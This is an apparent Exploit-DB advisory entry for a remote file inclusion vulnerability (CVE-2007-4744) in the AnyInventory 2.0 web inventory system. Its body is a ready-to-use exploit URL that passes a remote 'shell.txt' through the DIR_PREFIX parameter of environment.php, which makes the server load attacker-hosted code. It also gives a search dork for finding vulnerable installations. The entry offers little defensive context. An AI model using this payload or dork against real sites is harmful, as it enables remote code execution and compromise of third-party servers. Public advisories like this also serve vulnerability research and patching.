AnyInventory <= 2.0 environment.php Remote File Inclusion Vuln

2007-09-05T00:00:00
ID EDB-ID:4365
Type exploitdb
Reporter ThE TiGeR
Modified 2007-09-05T00:00:00

Description

AnyInventory <= 2.0 (environment.php) Remote File Inclusion Vuln. CVE-2007-4744. Webapps exploit for php platform

                                        
                                            #AnyInventory =&gt; 2.0 Remote file inclusion

#Download script : http://physics.ramapo.edu/downloads/anyInventory-1.9.1.tar.gz

#Exploit :

#http://victime.com/[anyInventory_path]/environment.php?DIR_PREFIX= shell.txt?

#Dork : anyInventory, the most flexible and powerful web-based inventory system

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail.com

# milw0rm.com [2007-09-05]